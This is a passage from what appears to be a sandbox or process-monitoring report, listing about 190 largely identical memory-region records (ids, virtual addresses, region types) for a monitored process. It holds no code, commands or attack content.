= "pagefile_0x0000000002880000" filename = "" Region: id = 1425 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1426 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1427 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1428 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1429 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1430 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1431 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1432 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1454 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 1455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1497 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1498 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1499 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1609 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1610 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1611 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 